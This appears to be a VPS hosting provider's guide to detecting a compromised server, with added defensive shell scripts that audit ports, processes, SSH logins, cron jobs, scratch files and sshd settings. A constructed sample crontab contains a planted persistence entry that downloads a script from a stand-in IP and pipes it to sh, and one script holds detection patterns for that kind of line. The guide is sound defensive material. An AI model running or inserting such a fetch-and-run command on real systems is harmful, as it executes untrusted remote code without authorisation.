๐Ÿ›ก๏ธ How to Check If Your VPS Is Compromised or Infected

If your VPS is behaving strangely, running slowly, or using more resources than expected, it could be compromised. Here's a simple step-by-step guide for Hosteons clients to help detect common signs of infection or unauthorized access.


✅ Step 1: Check for Unusual CPU or Memory Usage

Start by checking if any process is consuming excessive resources:

top

or use:

htop

Look for unfamiliar processes, especially those using a high percentage of CPU or memory.


🧠 Step 2: Check for Unknown Network Connections

You can inspect open ports and active connections with:

ss -tulnp

Also try:

netstat -antup

Check for unknown IP addresses or ports your VPS shouldn't be using (e.g., connections to cryptomining pools, spam servers, etc.), and for listening ports that none of your own services should have opened.
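An added example, not part of the Hosteons article, showing how to turn the `ss -tulnp` check into a repeatable comparison against a list of ports you expect to be open. The port list and the sample `ss` capture below are constructed for the dry run; replace EXPECTED_PORTS with the ports your own services use.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): compare the listening sockets
# reported by `ss -tulnp` against an allowlist of ports you expect to be open
# and print anything else for review.

# Ports this VPS is expected to listen on (constructed defaults: SSH, HTTP,
# HTTPS and chrony's NTP control port). Adjust to your own services.
EXPECTED_PORTS="22 80 443 323"

# Turn `ss -tulnp` output (on stdin) into "proto port process" lines.
# Works on a live listing or on a saved capture.
parse_listeners() {
    awk 'NR > 1 && $1 ~ /^(tcp|udp)$/ {
        n = split($5, addr, ":")          # Local Address:Port; IPv6 has many colons
        port = addr[n]
        proc = ""
        if (match($0, /users:\(\("[^"]+"/)) {
            proc = substr($0, RSTART + 9, RLENGTH - 10)   # text between the quotes
        }
        print $1, port, proc
    }'
}

# Print listeners whose port is not in EXPECTED_PORTS.
# Exit status: 0 when every listener is expected, 1 otherwise.
unexpected_listeners() {
    parse_listeners | awk -v allow="$EXPECTED_PORTS" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        !($2 in ok) {
            print "UNEXPECTED " $1 " port " $2 " (" ($3 == "" ? "unknown process" : $3) ")"
            bad = 1
        }
        END { exit (bad ? 1 : 0) }'
}

# Constructed sample capture in `ss -tulnp` format. The "updater" process on
# port 8222 is the planted finding; the process name and port are made up.
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      511    *:443              *:*           users:(("nginx",pid=990,fd=6))
tcp   LISTEN 0      128    [::]:22            [::]:*        users:(("sshd",pid=812,fd=4))
tcp   LISTEN 0      50     0.0.0.0:8222       0.0.0.0:*     users:(("updater",pid=2211,fd=5))
udp   UNCONN 0      0      127.0.0.1:323      0.0.0.0:*     users:(("chronyd",pid=600,fd=5))'

# Dry run over the constructed capture (prints the 8222 line).
printf '%s\n' "$SAMPLE_SS" | unexpected_listeners || true

# Live use, as root so process names are visible:
#   ss -tulnp | unexpected_listeners
```

The process column is only filled in when `ss` runs as root, so run the live check with sudo; a listener whose process shows up as "unknown process" when you are root is itself worth a closer look.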


๐Ÿ” Step 3: Scan Running Processes

List all processes with their command line details:

ps auxf

Watch for suspicious scripts, base64-encoded strings, or unfamiliar binaries.
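An added example, not part of the Hosteons article, that checks a process listing for the things Steps 1 and 3 ask you to look for: heavy CPU or memory use, binaries started from scratch directories such as /tmp or /dev/shm, and long base64-looking blobs on the command line. The thresholds and the sample `ps` capture are constructed; the base64 blob in the sample simply encodes the string ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): audit the output of
# `ps axo pid,pcpu,pmem,user,args` read from stdin and print the processes
# that match any of three heuristics.

CPU_LIMIT=80      # percent of one core; adjust for your workload (constructed default)
MEM_LIMIT=50      # percent of RAM (constructed default)

audit_processes() {
    awk -v cpu="$CPU_LIMIT" -v mem="$MEM_LIMIT" '
    NR == 1 { next }                                   # skip the header line
    {
        pid = $1; pcpu = $2 + 0; pmem = $3 + 0; user = $4; exe = $5
        args = ""
        for (i = 5; i <= NF; i++) args = args (i > 5 ? " " : "") $i
        why = ""
        if (pcpu >= cpu) why = why " high-cpu(" pcpu "%)"
        if (pmem >= mem) why = why " high-mem(" pmem "%)"
        # Executable living in a world-writable scratch directory.
        if (exe ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//) why = why " runs-from-scratch-dir"
        # A long token made only of base64 alphabet characters.
        for (i = 5; i <= NF; i++)
            if (length($i) >= 40 && $i ~ /^[A-Za-z0-9+\/=]+$/) { why = why " base64-like-arg"; break }
        if (why != "") { print "SUSPECT pid=" pid " user=" user ":" why " :: " args; n++ }
    }
    END { exit (n > 0) ? 1 : 0 }'                     # non-zero when anything was flagged
}

# Constructed sample in the layout of `ps axo pid,pcpu,pmem,user,args`.
# PIDs 2211 and 2230 are the planted findings; paths and names are made up.
SAMPLE_PS='  PID %CPU %MEM USER     COMMAND
    1  0.0  0.1 root     /sbin/init
  812  0.0  0.3 root     sshd: /usr/sbin/sshd -D
  990  1.2  0.8 www-data nginx: worker process
 2211 97.5  2.1 www-data /tmp/.x/agent -c /dev/shm/cfg
 2230  0.2  0.1 www-data sh -c echo QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5 | base64 -d'

# Dry run over the constructed capture (prints two SUSPECT lines).
printf '%s\n' "$SAMPLE_PS" | audit_processes || true

# Live use:
#   ps axo pid,pcpu,pmem,user,args | audit_processes
```

A hit on any one heuristic is a prompt to look closer, not a verdict: a legitimate backup job can peg the CPU, and a deploy tool may pass a long token. What you are looking for is the combination you cannot explain, such as a high-CPU process owned by the web server user and started from /tmp.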


๐Ÿ” Step 4: Check for New or Unauthorized Users

List all users:

cat /etc/passwd

Check recent logins:

last

Or failed login attempts:

grep "Failed password" /var/log/auth.log

Watch for users or login attempts you don't recognize.
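An added example, not part of the Hosteons article, that runs the "Failed password" check over auth.log lines and adds the two follow-ups a practitioner wants: which accounts actually logged in, and whether any source address that hammered the server with failures later got in. The log lines below are constructed (documentation IP ranges); on Debian/Ubuntu the real file is /var/log/auth.log, on RHEL-family systems it is /var/log/secure, and on systems without either you can feed it `journalctl -u ssh --no-pager`.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): SSH login analysis over sshd log
# lines read from stdin.

# Failed password attempts per source IP, most frequent first.
failed_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
        for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
    }
    END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Successful logins as "user ip method" (method is password or publickey).
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
        user = ""; ip = ""; method = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "Accepted") method = $(i+1)
            if ($i == "for")      user   = $(i+1)
            if ($i == "from")     ip     = $(i+1)
        }
        print user, ip, method
    }'
}

# Highest-priority finding: a source that failed at least MIN_FAILS times and
# then logged in successfully. Prints "ip fails user"; exit 1 if any were found.
failed_then_accepted() {
    awk -v min="${MIN_FAILS:-3}" '
    /Failed password for/ { for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++ }
    /Accepted (password|publickey) for/ {
        user = ""; ip = ""
        for (i = 1; i <= NF; i++) { if ($i == "for") user = $(i+1); if ($i == "from") ip = $(i+1) }
        if (fails[ip] >= min) { print ip, fails[ip], user; hit = 1 }
    }
    END { exit (hit ? 1 : 0) }'
}

# Constructed sample lines in the format sshd writes to auth.log.
SAMPLE_AUTH='Jun  3 10:12:01 vps sshd[1201]: Failed password for root from 198.51.100.23 port 51022 ssh2
Jun  3 10:12:03 vps sshd[1203]: Failed password for invalid user admin from 198.51.100.23 port 51030 ssh2
Jun  3 10:12:05 vps sshd[1205]: Failed password for root from 198.51.100.23 port 51041 ssh2
Jun  3 10:12:09 vps sshd[1209]: Failed password for invalid user test from 203.0.113.7 port 40011 ssh2
Jun  3 10:15:44 vps sshd[1250]: Accepted publickey for deploy from 192.0.2.10 port 55120 ssh2: ED25519 SHA256:constructedfingerprint
Jun  3 10:16:02 vps sshd[1261]: Accepted password for root from 198.51.100.23 port 51100 ssh2'

# Dry run over the constructed lines.
printf '%s\n' "$SAMPLE_AUTH" | failed_by_ip
printf '%s\n' "$SAMPLE_AUTH" | accepted_logins
printf '%s\n' "$SAMPLE_AUTH" | failed_then_accepted || true

# Live use (as root):
#   failed_then_accepted < /var/log/auth.log
```

In the sample, 198.51.100.23 fails three times and then logs in as root with a password: that single line is the one to act on, and it is exactly the pattern that a key-only, root-disabled sshd configuration (see the prevention tips) makes impossible.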


๐Ÿ•ต๏ธ Step 5: Inspect Cron Jobs & Scheduled Tasks

Malware often installs cron jobs to maintain persistence:

crontab -l
ls -la /etc/cron*

Look for unusual scripts or scheduled commands. Note that crontab -l only shows the crontab of the user you are logged in as; other users (including service accounts such as www-data) have their own.
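An added example, not part of the Hosteons article, that collects cron entries from every user and from the system cron directories and flags the patterns that most often mark a persistence job: a download piped straight into a shell, a base64-decoded command, and scripts kept in scratch or hidden directories. The sample crontab below is constructed; the base64 blob in it encodes a harmless alphabet string.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): gather and audit cron entries.

# Print every user crontab plus the system crontab files. Needs root for
# `crontab -l -u`; entries from /etc/cron.daily and friends are scripts, so
# review those with ls -la as the article says.
collect_cron() {
    cut -d: -f1 /etc/passwd | while read -r u; do
        crontab -l -u "$u" 2>/dev/null | sed "s/^/[$u] /"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null
}

# Read cron lines on stdin, skip comments and variable assignments, and print
# the lines that match any heuristic. Exit 1 if anything was flagged.
audit_cron_lines() {
    awk '
    /^[ \t]*(#|$)/ { next }                       # comments and blank lines
    /^[A-Za-z_][A-Za-z0-9_]*=/ { next }           # SHELL=, PATH=, MAILTO= ...
    {
        why = ""
        if ($0 ~ /(curl|wget)[^|]*[|][ \t]*(ba|da)?sh/)          why = why " download-piped-to-shell"
        if ($0 ~ /base64[ \t]+(-d|--decode)/)                     why = why " base64-decode"
        if ($0 ~ /(^|[ \t=])\/(tmp|var\/tmp|dev\/shm)\//)          why = why " scratch-dir-path"
        if ($0 ~ /\/\.[^\/ \t]+/)                                  why = why " hidden-path"
        if (why != "") { print "SUSPECT:" why " :: " $0; n++ }
    }
    END { exit (n > 0) ? 1 : 0 }'
}

# Constructed sample crontab. The last three entries are the planted findings;
# the IP is from a documentation range and the paths are made up.
SAMPLE_CRON='# m h dom mon dow user command
SHELL=/bin/sh
17 *    * * *   root     cd / && run-parts --report /etc/cron.hourly
0 3     * * *   root     /usr/local/bin/backup.sh
*/5 *   * * *   www-data /tmp/.cache/.sys >/dev/null 2>&1
@reboot         root     curl -s http://198.51.100.5/i.sh | sh
0 */6   * * *   root     echo QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5 | base64 -d'

# Dry run over the constructed sample (prints three SUSPECT lines).
printf '%s\n' "$SAMPLE_CRON" | audit_cron_lines || true

# Live use (as root):
#   collect_cron | audit_cron_lines
```

Cron is not the only scheduler on a modern VPS: also run `systemctl list-timers --all` and review any timer or service unit you did not create, since systemd units are a common alternative hiding place.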


๐Ÿš Step 6: Scan for Malware

Install and run a malware scanner like Chkrootkit or ClamAV:

Chkrootkit:

apt install chkrootkit   # Debian/Ubuntu
chkrootkit

ClamAV:

apt install clamav
freshclam
clamscan -r /

These tools help detect rootkits, backdoors, and trojans. Run them as root, and keep in mind that a rootkit on the live system can hide itself from tools running on that same system, so a clean result is reassuring but not proof that the VPS is clean.


๐Ÿ“ Step 7: Check for Suspicious Files

Search for recently modified or hidden files:

find / -type f -mtime -2
find / -name ".*" -type f

Look especially in /tmp, /var/tmp, and /dev/shm, which are common hiding places for malicious scripts because any user can write there.
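An added example, not part of the Hosteons article, that wraps the two find commands so they skip /proc and /sys, stay on one filesystem, and focus on what matters most in the scratch directories: files that are executable or hidden. The directory list is a constructed default.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): file checks for Step 7.

# World-writable scratch directories malware tends to use (constructed default).
SCRATCH_DIRS="/tmp /var/tmp /dev/shm"

# Regular files modified in the last DAYS days under the given directories,
# skipping pseudo-filesystems and without crossing into other mounts.
# Usage: recent_files DAYS DIR...
recent_files() {
    days=$1; shift
    for d in "$@"; do
        find "$d" -xdev \( -path /proc -o -path /sys -o -path /run \) -prune -o \
             -type f -mtime -"$days" -print 2>/dev/null
    done
}

# Regular files in the given directories that are executable by their owner
# (-perm -100) or hidden (name starts with a dot).
# Usage: scratch_suspects DIR...
scratch_suspects() {
    for d in "$@"; do
        find "$d" -xdev -type f \( -perm -100 -o -name '.*' \) -print 2>/dev/null
    done
}

# Long listing (owner, mode, mtime) for each path read on stdin, so you can
# see who created the file and when.
detail() {
    while read -r f; do ls -ld -- "$f"; done
}

# Typical use: everything executable or hidden in the scratch directories.
scratch_suspects $SCRATCH_DIRS | detail

# Everything on the root filesystem changed in the last two days (can be long):
#   recent_files 2 / | detail
```

Ownership and timestamps are the useful context here: a hidden executable in /tmp owned by the web server user, created minutes after a burst of odd requests in the web server log, tells a much clearer story than the file name alone.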


📜 Step 8: Check System Logs

Scan through /var/log/syslog, /var/log/auth.log, and /var/log/messages for any strange activity.

Example:

less /var/log/auth.log

Use grep to search for specific keywords such as "root", "sudo", or "fail", e.g. grep -i fail /var/log/auth.log.


🚨 What to Do If You Suspect a Compromise

If you suspect your VPS has been compromised:

1. Disconnect from the internet (disable the network interface). Do this from the VPS console rather than over SSH, since it will also drop your own SSH session.

2. Back up important data (be cautious with infected files).

3. Open a support ticket with Hosteons: https://my.hosteons.com

4. Consider wiping and reinstalling the OS for full peace of mind.

5. Change all relevant passwords and SSH keys.


🧯 Prevention Tips

• Use strong passwords and SSH keys

• Keep your software and OS updated

• Disable root login and use a non-root user with sudo

• Set up a firewall like ufw

• Regularly monitor your server
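An added example, not part of the Hosteons article, covering the "disable root login" and "set up a firewall" tips: a small audit of sshd_config that reports the weak settings next to what they should be, plus the ufw baseline the tip refers to. The two configuration snippets are constructed; sshd's real defaults (PermitRootLogin prohibit-password, PasswordAuthentication yes) are used when a keyword is absent.

```shell
#!/bin/sh
# Added example (not Hosteons' own script): sshd_config audit and ufw baseline.

# Read an sshd_config (or the output of `sshd -T`) on stdin and report the two
# settings that matter most. sshd honours the FIRST occurrence of a keyword,
# keywords are case-insensitive, and only the global section (before any
# Match block) is considered here. Exit 1 if anything is weak.
audit_sshd_config() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    tolower($1) == "match" { exit }                  # stop at the first Match block
    { k = tolower($1); if (!(k in val)) val[k] = tolower($2) }
    END {
        prl = ("permitrootlogin" in val)        ? val["permitrootlogin"]        : "prohibit-password"
        pwa = ("passwordauthentication" in val) ? val["passwordauthentication"] : "yes"
        bad = 0
        if (prl == "yes") { print "WEAK PermitRootLogin yes (set to no, or at least prohibit-password)"; bad = 1 }
        else                print "OK   PermitRootLogin " prl
        if (pwa == "yes") { print "WEAK PasswordAuthentication yes (use SSH keys and set it to no)"; bad = 1 }
        else                print "OK   PasswordAuthentication " pwa
        exit bad
    }'
}

# Minimal ufw baseline for a web server: deny inbound by default and allow
# only SSH and HTTP(S). Run as root, and keep the SSH rule before `enable`
# so you do not lock yourself out. Not invoked below; call it deliberately.
apply_firewall_baseline() {
    ufw default deny incoming
    ufw default allow outgoing
    ufw allow OpenSSH
    ufw allow 80/tcp
    ufw allow 443/tcp
    ufw --force enable
}

# Constructed: the weak configuration this tip warns about.
WEAK_CONFIG='# root may log in with a password
Port 22
PermitRootLogin yes
PasswordAuthentication yes'

# Constructed: the hardened equivalent (key-only, no root, one allowed user).
HARDENED_CONFIG='Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers deploy'

printf '%s\n' "$WEAK_CONFIG"     | audit_sshd_config || true
printf '%s\n' "$HARDENED_CONFIG" | audit_sshd_config

# Live use (as root; `sshd -T` prints the effective configuration):
#   sshd -T | audit_sshd_config
```

Before setting PasswordAuthentication to no, confirm from a second terminal that key-based login works for your sudo user; the audit tells you where you stand, but the order in which you apply the changes is what keeps you from locking yourself out.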


Stay secure,

The Hosteons Team